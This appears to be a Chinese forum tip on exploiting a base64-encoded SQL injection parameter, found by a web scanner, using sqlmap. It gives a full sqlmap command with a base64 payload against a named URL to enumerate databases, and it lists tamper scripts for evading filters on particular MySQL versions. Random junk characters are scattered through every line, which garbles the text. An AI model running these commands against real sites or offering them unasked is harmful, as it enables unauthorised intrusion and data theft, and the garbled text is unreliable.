WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
5 n) {- x! ?! M
3 U; A- @7 {7 t, N6 gsqlmap的tamper里有个base64encode.py2 I) }' m- X$ v( `
* T. \/ L" U( i; `, x) Q/ |2 h使用如下. g$ G+ U. N( g" Q: x& I+ ^/ a
# }3 R6 M& j% P/ ~+ T1 I+ Msqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs( S5 V, L2 p5 v. ?" j2 i
. k9 t# ^: E; x$ p8 Q6 A6 L% y0 Q; n1 j, `2 t& d
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”8 x4 N) D$ |6 Y6 |5 a! L
. |+ W) ^& {$ ^& Q& ]" J其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
1 l1 {! C4 n [2 ]" D
% u. |$ L4 e! w) O1 t; s9 Sspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
) q, k6 U+ F2 t8 w: [) Dspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
- n$ N, Z. ?2 l' d2 s: c: l. _首先确定目标数据库版本,然后选择相应的脚本。
1 ]* {% d# D( j0 _# @-v 3 --batch --tamper "space2hash.py"
+ i, y* B0 u' U! E6 D3 T P
' N* d& o( `5 h; D还有其他一些插件:
6 r+ P% W D6 m3 s2 ~% S, Qencodes编码 ——charencode.py
% U$ ?" n* T5 |base64编码 —— base64encode.py
* i, e f' J0 f$ y替换空格和关键字 —— halfversionedmorekeywords.py
, ~) h% \8 J5 U+ C3 F |
/ ?( y; A9 y; S, v0 c9 N2 I
8 s, H8 z# k3 w- J$ c4 i% q- \7 p& B/ y9 p& R! [
2 g! C1 C' e! s8 D5 i6 E) j |